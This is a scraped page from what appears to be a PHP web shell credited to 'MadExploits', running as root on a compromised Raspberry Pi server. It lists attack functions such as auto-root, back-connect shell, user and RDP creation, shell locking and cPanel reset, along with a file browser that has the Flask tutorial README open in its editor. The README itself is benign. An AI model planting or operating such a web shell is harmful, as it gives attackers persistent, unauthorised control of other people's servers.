Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python3-flask /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
flaskr
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
LICENSE
1.54
KB
-rw-r--r--
MANIFEST.in
118
B
-rw-r--r--
README.rst
1.28
KB
-rw-r--r--
setup.cfg
149
B
-rw-r--r--
setup.py
662
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.rst
Flaskr ====== The basic blog app built in the Flask `tutorial`_. .. _tutorial: http://flask.pocoo.org/docs/tutorial/ Install ------- **Be sure to use the same version of the code as the version of the docs you're reading.** You probably want the latest tagged version, but the default Git version is the master branch. :: # clone the repository git clone https://github.com/pallets/flask cd flask # checkout the correct version git tag # shows the tagged versions git checkout latest-tag-found-above cd examples/tutorial Create a virtualenv and activate it:: python3 -m venv venv . venv/bin/activate Or on Windows cmd:: py -3 -m venv venv venv\Scripts\activate.bat Install Flaskr:: pip install -e . Or if you are using the master branch, install Flask from source before installing Flaskr:: pip install -e ../.. pip install -e . Run --- :: export FLASK_APP=flaskr export FLASK_ENV=development flask run Or on Windows cmd:: set FLASK_APP=flaskr set FLASK_ENV=development flask run Open http://127.0.0.1:5000 in a browser. Test ---- :: pip install '.[test]' pytest Run with coverage report:: coverage run -m pytest coverage report coverage html # open htmlcov/index.html in a browser
Close